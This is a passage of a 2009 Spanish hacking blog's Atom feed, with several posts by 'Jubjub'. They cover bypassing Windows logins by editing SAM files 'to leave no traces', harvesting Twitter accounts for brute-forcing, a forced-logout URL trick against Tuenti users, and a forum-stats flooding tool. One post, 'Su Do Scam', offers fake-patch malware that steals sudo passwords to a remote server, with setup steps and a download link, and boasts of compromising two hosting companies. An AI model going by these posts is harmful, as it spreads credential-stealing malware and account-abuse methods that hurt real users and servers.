style="font-size:130%;"&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="font-size:130%;"&gt;&lt;a style="font-weight: bold;"&gt;[Descarga]&lt;/a&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6014016604825873236-2690643341670681073?l=jugandoconfosforos.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jugandoconfosforos.blogspot.com/feeds/2690643341670681073/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/05/cronos-arte-y-backups-sql.html#comment-form' title='2 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/2690643341670681073'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/2690643341670681073'/><link rel='alternate' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/05/cronos-arte-y-backups-sql.html' title='Cronos: Arte y Backups SQL'/><author><name>Jubjub</name><uri>http://www.blogger.com/profile/07059259636381672567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='28' src='http://3.bp.blogspot.com/_-dOA210g16k/SeTNpvzWCII/AAAAAAAAABU/GzaeYJu-yws/s1600-R/index.php%3Faction%3Ddlattach%3Battach%3D6%3Btype%3Davatar'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6014016604825873236.post-1889236294709986288</id><published>2009-05-03T00:29:00.006+02:00</published><updated>2009-05-03T01:31:22.403+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='facil'/><category scheme='http://www.blogger.com/atom/ns#' term='juankeo'/><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><category scheme='http://www.blogger.com/atom/ns#' term='kon-boot'/><category scheme='http://www.blogger.com/atom/ns#' term='boot'/><title type='text'>Kon-Boot: Insultantemente facil</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_LztS6-97iyY/Sfin--TJdHI/AAAAAAAAEBE/W_vwkSWWDLw/s200/konboot.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 132px; height: 184px;" src="http://3.bp.blogspot.com/_LztS6-97iyY/Sfin--TJdHI/AAAAAAAAEBE/W_vwkSWWDLw/s200/konboot.jpg" alt="" border="0" /&gt;&lt;/a&gt;Hay cosas que me molestan, y entre ellas estan &lt;span style="font-weight: bold; color: rgb(255, 153, 102);"&gt;Kon-Boot&lt;/span&gt;.&lt;br /&gt;Aun recuerdo aquellos momentos en los que montaba mi Live-CD,&lt;br /&gt;&lt;br /&gt;y por linea de comandos (ya sabeis, los hombres de verdad no usan ratón &lt;img src="http://foro.elhacker.net/Smileys/cowboy/laugh.gif" alt=":laugh:" title=":laugh:" align="bottom" /&gt; ) editaba los sam para entrar en cualquier &lt;span style="color: rgb(0, 0, 102); font-weight: bold;"&gt;Windows&lt;/span&gt; protegido con pass, hacer lo que quisiera, y reparar los sam&lt;br /&gt;&lt;br /&gt;para no dejar huellas.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Que divertido eran esos momentos de juankeo lammer... parece que llega el fin de esos dias, con el &lt;span style="font-weight: bold; color: rgb(255, 153, 0);"&gt;Kon-Boot&lt;/span&gt;. &lt;img src="http://foro.elhacker.net/Smileys/cowboy/cry.gif" alt=":-(" title=":-(" align="bottom" /&gt;&lt;br /&gt;&lt;br /&gt;Simplemente, &lt;span style="font-weight: bold;"&gt;lo grabas en un CD, arrancas con el&lt;/span&gt; y parchea el kernel en memoria para saltarse la autentificación. &lt;span style="font-family:lucida grande;"&gt;Insultante&lt;/span&gt;. Me niego a dejar link.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6014016604825873236-1889236294709986288?l=jugandoconfosforos.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jugandoconfosforos.blogspot.com/feeds/1889236294709986288/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/05/kon-boot-insultantemente-facil.html#comment-form' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/1889236294709986288'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/1889236294709986288'/><link rel='alternate' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/05/kon-boot-insultantemente-facil.html' title='Kon-Boot: Insultantemente facil'/><author><name>Jubjub</name><uri>http://www.blogger.com/profile/07059259636381672567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='28' src='http://3.bp.blogspot.com/_-dOA210g16k/SeTNpvzWCII/AAAAAAAAABU/GzaeYJu-yws/s1600-R/index.php%3Faction%3Ddlattach%3Battach%3D6%3Btype%3Davatar'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_LztS6-97iyY/Sfin--TJdHI/AAAAAAAAEBE/W_vwkSWWDLw/s72-c/konboot.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6014016604825873236.post-562427165972783566</id><published>2009-05-01T20:15:00.003+02:00</published><updated>2009-05-01T20:36:10.319+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='dork'/><category scheme='http://www.blogger.com/atom/ns#' term='python'/><category scheme='http://www.blogger.com/atom/ns#' term='ing. social'/><category scheme='http://www.blogger.com/atom/ns#' term='twitter'/><category scheme='http://www.blogger.com/atom/ns#' term='google'/><title type='text'>Yo, Twitter y el ataque 1 Entrega #2</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.perubeta.com/wp-content/uploads/2009/02/twitter_logo.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 285px; height: 209px;" src="http://www.perubeta.com/wp-content/uploads/2009/02/twitter_logo.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Despues del programa de ayer, tengo una lista con 1000 usuarios de &lt;span style="color: rgb(0, 204, 204); font-weight: bold;"&gt;Twitter &lt;/span&gt;&lt;span style="color: rgb(0, 204, 204); font-weight: bold;"&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;/span&gt;(el maximo que me dejo google antes de banearme)&lt;br /&gt;&lt;br /&gt;Con esta lista comienza la parte interesante... &lt;a href="http://www.securitybydefault.com/2009/04/aplicando-fuerza-espartana-digg.html"&gt;Fuerza Bruta Espartana&lt;/a&gt; (como dicen por &lt;span style="font-weight: bold;"&gt;SbD&lt;/span&gt;, un saludo desde aqui)&lt;br /&gt;&lt;br /&gt;Comenzare a preparar la lista de contraseñas mas utilizadas segun algunos estudios publicos y propios, volvere en poco con el programa (si sale bien, quizas veamos algo espectacular :D )&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6014016604825873236-562427165972783566?l=jugandoconfosforos.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jugandoconfosforos.blogspot.com/feeds/562427165972783566/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/05/yo-twitter-y-el-ataque-1-entrega-2.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/562427165972783566'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/562427165972783566'/><link rel='alternate' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/05/yo-twitter-y-el-ataque-1-entrega-2.html' title='Yo, Twitter y el ataque 1 Entrega #2'/><author><name>Jubjub</name><uri>http://www.blogger.com/profile/07059259636381672567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='28' src='http://3.bp.blogspot.com/_-dOA210g16k/SeTNpvzWCII/AAAAAAAAABU/GzaeYJu-yws/s1600-R/index.php%3Faction%3Ddlattach%3Battach%3D6%3Btype%3Davatar'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6014016604825873236.post-2878651287843498224</id><published>2009-05-01T01:12:00.004+02:00</published><updated>2009-05-01T01:36:08.358+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='espartanos'/><category scheme='http://www.blogger.com/atom/ns#' term='fuerza bruta'/><category scheme='http://www.blogger.com/atom/ns#' term='dork'/><category scheme='http://www.blogger.com/atom/ns#' term='python'/><category scheme='http://www.blogger.com/atom/ns#' term='twitter'/><category scheme='http://www.blogger.com/atom/ns#' term='google'/><title type='text'>Yo, Twitter y Google Dorks Entrega #1</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;a href="http://www.perubeta.com/wp-content/uploads/2009/02/twitter_logo.jpg"&gt;&lt;img style="width: 305px; height: 224px;" class="alignnone size-full wp-image-145" title="twitter_logo" src="http://www.perubeta.com/wp-content/uploads/2009/02/twitter_logo.jpg" alt="twitter_logo" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 204, 204); font-weight: bold;"&gt;Twitter&lt;/span&gt;. Parece que esta de moda por la de fallos que le sacan ultimamente (lease el gusanito de Twitter&lt;a href="javascript:void(0);" onclick="replaceText(' :P', document.forms.postmodify.message); return false;"&gt;&lt;img src="http://foro.elhacker.net/Smileys/cowboy/tongue.gif" alt=":P" title=":P" align="bottom" /&gt;&lt;/a&gt;)&lt;br /&gt;&lt;br /&gt;Me apunto a la moda: voy a pegarme con &lt;span style="color: rgb(0, 204, 204); font-weight: bold;"&gt;Twitter&lt;/span&gt;.. Veremos si consigo que el blog salga en un par de &lt;span style="color: rgb(0, 204, 204); font-weight: bold;"&gt;Tweets&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;Empezamos con ayudarnos de Google para sacar unos cientos de miles de cuentas de &lt;span style="color: rgb(0, 204, 204); font-weight: bold;"&gt;Twitter&lt;/span&gt; (a lo mejor menos&lt;a href="javascript:void(0);" onclick="replaceText(' :silbar:', document.forms.postmodify.message); return false;"&gt;&lt;img src="http://foro.elhacker.net/Smileys/cowboy/silbar.gif" alt=":silbar:" title=":silbar:" align="bottom" /&gt;&lt;/a&gt; ) (con esta facil &lt;a href="http://www.google.es/search?hl=es&amp;amp;safe=off&amp;amp;client=firefox-a&amp;amp;rls=com.ubuntu%3Aes-ES%3Aunofficial&amp;amp;q=site%3Atwitter.com+inurl%3A%2F&amp;amp;btnG=Buscar&amp;amp;meta="&gt;busqueda&lt;/a&gt;)&lt;a href="javascript:void(0);" onclick="replaceText(' ;-)', document.forms.postmodify.message); return false;"&gt;&lt;img src="http://foro.elhacker.net/Smileys/cowboy/aplaudir.gif" alt=";-)" title=";-)" align="bottom" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://pygments.org/demo/1714/"&gt;Codigo en Python del programa&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Asi que despues de dejarlo toda la noche trabajando con unos ajustes para que guarde todo en un txt, espero encontrarme una gigantesca lista de cuentas con las que hacer fuerza bruta espartana (como dicen en SbD &lt;a href="javascript:void(0);" onclick="replaceText(' :laugh:', document.forms.postmodify.message); return false;"&gt;&lt;img src="http://foro.elhacker.net/Smileys/cowboy/laugh.gif" alt=":laugh:" title=":laugh:" align="bottom" /&gt;&lt;/a&gt; )&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6014016604825873236-2878651287843498224?l=jugandoconfosforos.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jugandoconfosforos.blogspot.com/feeds/2878651287843498224/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/05/yo-twitter-y-google-dorks-entrega-1.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/2878651287843498224'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/2878651287843498224'/><link rel='alternate' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/05/yo-twitter-y-google-dorks-entrega-1.html' title='Yo, Twitter y Google Dorks Entrega #1'/><author><name>Jubjub</name><uri>http://www.blogger.com/profile/07059259636381672567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='28' src='http://3.bp.blogspot.com/_-dOA210g16k/SeTNpvzWCII/AAAAAAAAABU/GzaeYJu-yws/s1600-R/index.php%3Faction%3Ddlattach%3Battach%3D6%3Btype%3Davatar'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6014016604825873236.post-1103109892705061874</id><published>2009-04-28T22:29:00.002+02:00</published><updated>2009-04-28T22:30:27.546+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='python'/><category scheme='http://www.blogger.com/atom/ns#' term='ing. social'/><category scheme='http://www.blogger.com/atom/ns#' term='ubuntu'/><category scheme='http://www.blogger.com/atom/ns#' term='Su Do Scam'/><title type='text'>Desvirgando a Linux: Rooteo por Ing. Social</title><content type='html'>Viendo el poco malware que hay para Linux.. aqui viene un simple malware para distros de GNU/Linux que usan el comando "sudo", como el archiconocido &lt;b&gt;Ubuntu&lt;/b&gt; y su familia  &lt;img src="https://foro.elhacker.net/Smileys/cowboy/laugh.gif" alt=":laugh:" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;Esta programado en Phyton, y simula ser un scrip de instalacion, o de ejecucion de algun programa, el cual debes de correr con un comando sudo especial, como veremos mas adelante.&lt;br /&gt;&lt;br /&gt;&lt;span style="line-height: 1.3em;font-size:20;" &gt;&lt;span style="text-decoration: underline;"&gt;&lt;b&gt;Su Do Scam&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:red;"&gt;&lt;b&gt;version 1.2&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Nuestra desprevenida victima, inocentemente, intentara, en un servidor corriendo Ubuntu Server, ejecutar el "Parche de Seguridad para MySQL" que encontro en nuestra web.  &lt;img src="https://foro.elhacker.net/Smileys/cowboy/cool.gif" alt="::)" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;Hara un &lt;div class="codeheader"&gt;Código:&lt;/div&gt;&lt;div class="code"&gt;&lt;pre style="margin-top: 0pt; display: inline;"&gt;./install&lt;/pre&gt;&lt;/div&gt; y vera esto :&lt;br /&gt;&lt;br /&gt;&lt;img src="http://img.drawcoders.net/index.php?acn=observar&amp;amp;idi=644089cf3f_uno.png" alt="" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;Sorprendido pensara en lo increiblemente bueno y seguro que es su Ubuntu, y en la de formas distintas que hay de hacer la misma cosa...  &lt;img src="https://foro.elhacker.net/Smileys/cowboy/kiss.gif" alt=":-*" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;Asi que seguira las instrucciones de el parche:&lt;br /&gt;&lt;br /&gt;&lt;img src="http://img.drawcoders.net/index.php?acn=observar&amp;amp;idi=74a1896931_dos.png" alt="" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;Perfecto, el sudo de toda la vida. No se ve la pass al escribirla, todo parece normal. Aprieta intro... &lt;img src="https://foro.elhacker.net/Smileys/cowboy/cheesy.gif" alt=":D" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://img.drawcoders.net/index.php?acn=observar&amp;amp;idi=c3b3c9e24f_tres.png" alt="" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;Oh, vaya, el lado malo de Linux. Parece que me falta una lib...  &lt;img src="https://foro.elhacker.net/Smileys/cowboy/huh.gif" alt=":huh:" border="0" /&gt; despues de duros intentos, desiste y se va al bar a tomar unas cervezas.&lt;br /&gt;&lt;br /&gt;Ahi es cuando entramos nosotros, visitamos nuestro servidor.. y ¡oh, sorpresa! ¿que hay alli?&lt;br /&gt;&lt;br /&gt;&lt;a href="http://img.drawcoders.net/index.php?acn=observar&amp;amp;idi=406be5d7bd_cuatro.png" target="_blank" class="posted"&gt;¿Que sera?&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Con estos datos entrar por ssh y rootear es un juego de niños  &lt;img src="https://foro.elhacker.net/Smileys/cowboy/aplaudir.gif" alt=";-)" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;Vale, un experto quizas no caera en esto.. pero he probado con dos empresas de hosting, y han caido como conejos  &lt;img src="https://foro.elhacker.net/Smileys/cowboy/laugh.gif" alt=":laugh:" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="text-decoration: underline;"&gt;&lt;b&gt;Modo de uso&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;-Abrir la carpeta www y subir los archivos de ahi a un servidor web que permita php (dadle permisos 777 )&lt;br /&gt;-Abrir la carpeta bin, el archivo install y editar en la configuracion la url de nuestro archivo php recien subido&lt;br /&gt;-Preparad algo para que el script resulte creible  &lt;img src="https://foro.elhacker.net/Smileys/cowboy/rolleyes.gif" alt=":rolleyes:" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.box.net/shared/z6azzh9z9r" target="_blank" class="posted"&gt;&lt;span style="line-height: 1.3em;font-size:17;" &gt;[DESCARGA]&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;Bueno, no es una obra de ingenieria, pero si de arte &lt;img src="https://foro.elhacker.net/Smileys/cowboy/tongue.gif" alt=":P" border="0" /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6014016604825873236-1103109892705061874?l=jugandoconfosforos.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jugandoconfosforos.blogspot.com/feeds/1103109892705061874/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/04/desvirgando-linux-rooteo-por-ing-social.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/1103109892705061874'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/1103109892705061874'/><link rel='alternate' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/04/desvirgando-linux-rooteo-por-ing-social.html' title='Desvirgando a Linux: Rooteo por Ing. Social'/><author><name>Jubjub</name><uri>http://www.blogger.com/profile/07059259636381672567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='28' src='http://3.bp.blogspot.com/_-dOA210g16k/SeTNpvzWCII/AAAAAAAAABU/GzaeYJu-yws/s1600-R/index.php%3Faction%3Ddlattach%3Battach%3D6%3Btype%3Davatar'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6014016604825873236.post-1575163248725579970</id><published>2009-04-26T22:54:00.004+02:00</published><updated>2009-04-26T23:33:49.351+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='abril negro'/><category scheme='http://www.blogger.com/atom/ns#' term='tuenti'/><category scheme='http://www.blogger.com/atom/ns#' term='putada'/><title type='text'>Malas noticias para los tuenti-yonquis</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.harry-inc.com/wp-content/uploads/image/tuenti.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 177px; height: 120px;" src="http://www.harry-inc.com/wp-content/uploads/image/tuenti.jpg" alt="" border="0" /&gt;&lt;/a&gt;Solo quedan dos opciones, esperar a que lo reparen o ir buscando metadona.&lt;img src="http://foro.elhacker.net/Smileys/cowboy/tongue.gif" alt=":P" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;El fallo viene de la funcion de tuenti para reconocer automaticamente imagenes, parece que solo busca por el http: y el .jpg... asi que podemos colarles todas las variables php que gustemos en la url.. algo asi:&lt;br /&gt;&lt;br /&gt;&lt;pre style="margin-top: 0pt; display: inline; font-style: italic; font-family: georgia;"&gt;&lt;/pre&gt;&lt;div  style="text-align: center;font-family:georgia;"&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-style: italic;"&gt;    http://www.jubjub.es/jubjub.php?variable=buenas&amp;amp;ima=jubjub.jpg&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;pre style="margin-top: 0pt; display: inline; font-style: italic;"&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: left;"&gt;&lt;span style="font-style: italic;"&gt;&lt;/span&gt;Seamos cabrones.. Dejare volar a vuestra imaginacion. Poned un comentario en el perfil de alguien, y vereis &lt;a href="javascript:void(0);" onclick="replaceText(' ;D', document.forms.postmodify.message); return false;"&gt;&lt;img src="http://foro.elhacker.net/Smileys/cowboy/grin.gif" alt=";D" title=";D" align="bottom" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;pre style="margin-top: 0pt; display: inline; font-style: italic;"&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: center;"&gt;&lt;span style=";font-family:georgia;font-size:85%;"  &gt;&lt;span style="font-style: italic;"&gt;http://m.tuenti.com/?m=login&amp;amp;func=log_out&lt;/span&gt;&lt;b style="font-style: italic;"&gt;&lt;span style="color:red;"&gt;&amp;amp;&lt;/span&gt;img=jugandoconfosforos.jpg&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;O los amigos de &lt;span style="font-weight: bold;"&gt;Tuenti&lt;/span&gt; se dan prisa, o las clinicas de desintoxicacion se van a llenar&lt;a href="javascript:void(0);" onclick="replaceText(' :xD', document.forms.postmodify.message); return false;"&gt;&lt;img src="http://foro.elhacker.net/Smileys/cowboy/xd.gif" alt=":xD" title=":xD" align="bottom" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;pre style="margin-top: 0pt; display: inline; font-style: italic;"&gt;&lt;/pre&gt;&lt;br /&gt;Gracias a Dimitrix por avisar &lt;a href="javascript:void(0);" onclick="replaceText(' ;-)', document.forms.postmodify.message); return false;"&gt;&lt;img src="http://foro.elhacker.net/Smileys/cowboy/aplaudir.gif" alt=";-)" title=";-)" align="bottom" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6014016604825873236-1575163248725579970?l=jugandoconfosforos.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jugandoconfosforos.blogspot.com/feeds/1575163248725579970/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/04/malas-noticias-para-los-tuenti-yonquis.html#comment-form' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/1575163248725579970'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/1575163248725579970'/><link rel='alternate' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/04/malas-noticias-para-los-tuenti-yonquis.html' title='Malas noticias para los tuenti-yonquis'/><author><name>Jubjub</name><uri>http://www.blogger.com/profile/07059259636381672567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='28' src='http://3.bp.blogspot.com/_-dOA210g16k/SeTNpvzWCII/AAAAAAAAABU/GzaeYJu-yws/s1600-R/index.php%3Faction%3Ddlattach%3Battach%3D6%3Btype%3Davatar'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6014016604825873236.post-2782435489380952452</id><published>2009-04-25T21:52:00.002+02:00</published><updated>2009-04-25T21:54:47.296+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='estadisticas'/><category scheme='http://www.blogger.com/atom/ns#' term='abril negro'/><category scheme='http://www.blogger.com/atom/ns#' term='smf'/><category scheme='http://www.blogger.com/atom/ns#' term='python'/><title type='text'>Mi obra maestra (por el momento)</title><content type='html'>Siguendo la iniciativa de codigo libre personal que llevo manteniendo estos años, os presento una version Open Source del Ghost SMF de WHK. Es poco ineficaz, ya que uso la urllib por pura vagueria, pero si veo que os gusta, lo paso a sockets.&lt;br /&gt;&lt;br /&gt;Esta programado en Phyton, y segun mis calculos es mucho mas rapida que la Ghost SMF &lt;img src="http://foro.elhacker.net/Smileys/cowboy/smiley.gif" alt=":)" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="line-height: 1.3em;font-size:20;" &gt;&lt;span style="text-decoration: underline;"&gt;&lt;b&gt;Snake Ghost SMF&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:red;"&gt;&lt;b&gt;version 0.4&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;img src="http://img.drawcoders.net/index.php?acn=observar&amp;amp;idi=6507c15f0f_Pantallazo-SPE-JubSnake--home-javier-Escritorio-PressCtrlCtostop-1.png" alt="" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;Su uso no tiene perdida, solo necesitais escribir la url del foro que querais (deberia de ir con cualquier tipo de foro, pero solo lo he probado en SMF)&lt;br /&gt;&lt;br /&gt;Vereis esto:&lt;br /&gt;&lt;img src="http://img.drawcoders.net/index.php?acn=observar&amp;amp;idi=023f463b47_Pantallazo-SPE-JubSnake--home-javier-Escritorio-PressCtrlCtostop.png" alt="" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;Y tras unos segundos...&lt;br /&gt;&lt;br /&gt;&lt;img src="http://img.drawcoders.net/index.php?acn=observar&amp;amp;idi=10776c14bf_onpeople.jpg" alt="" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;Debido a que es la primera aplicacion que hago en Phyton, y la primera en la que el rendimiento es critico, hay un pequeño fallo:&lt;br /&gt;&lt;br /&gt;&lt;img src="http://img.drawcoders.net/index.php?acn=observar&amp;amp;idi=38db21cd8c_Pantallazo-Monitordelsistema.png" alt="" border="0" height="600" width="1200" /&gt;&lt;br /&gt;&lt;br /&gt;Si veo que os animais, saco la version optimizada &lt;img src="http://foro.elhacker.net/Smileys/cowboy/smiley.gif" alt=":)" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;PD: No me he basado en el de WHK para hacerlo &lt;img src="http://foro.elhacker.net/Smileys/cowboy/tongue.gif" alt=":P" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="text-decoration: underline;"&gt;&lt;b&gt;Explicacion de funcionamiento:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;Es simple, hacemos peticiones masicas a la url que introducimos, añadiendo una cabecera modificada, el &lt;b&gt;X-Forwarded-For&lt;/b&gt;.  &lt;img src="http://foro.elhacker.net/Smileys/cowboy/cool.gif" alt="::)" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;Esta cabecera hace pensar a SMF que somos un proxy a traves del cual estan entrando centenares de users para ver el foro, cada uno con distinta IP, con lo que les suma a las estadisticas  &lt;img src="http://foro.elhacker.net/Smileys/cowboy/laugh.gif" alt=":laugh:" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;Para descargar, haz click en el amigo&lt;br /&gt;&lt;div align="center"&gt;&lt;a href="http://www.box.net/shared/itjnig7fuy" target="_blank" class="posted"&gt;&lt;img src="http://animalesmascotas.com/wp-content/uploads/2008/03/piton1g.jpg" alt="" border="0" height="162" width="225" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Los que useis Windows, necesitareis bajaros Python de la web oficial &lt;img src="http://foro.elhacker.net/Smileys/cowboy/smiley.gif" alt=":)" border="0" /&gt;&lt;br /&gt;Para los Linuxeros, ./  &lt;img src="http://foro.elhacker.net/Smileys/cowboy/tongue.gif" alt=":P" border="0" /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6014016604825873236-2782435489380952452?l=jugandoconfosforos.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jugandoconfosforos.blogspot.com/feeds/2782435489380952452/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/04/mi-obra-maestra-por-el-momento.html#comment-form' title='2 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/2782435489380952452'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/2782435489380952452'/><link rel='alternate' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/04/mi-obra-maestra-por-el-momento.html' title='Mi obra maestra (por el momento)'/><author><name>Jubjub</name><uri>http://www.blogger.com/profile/07059259636381672567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='28' 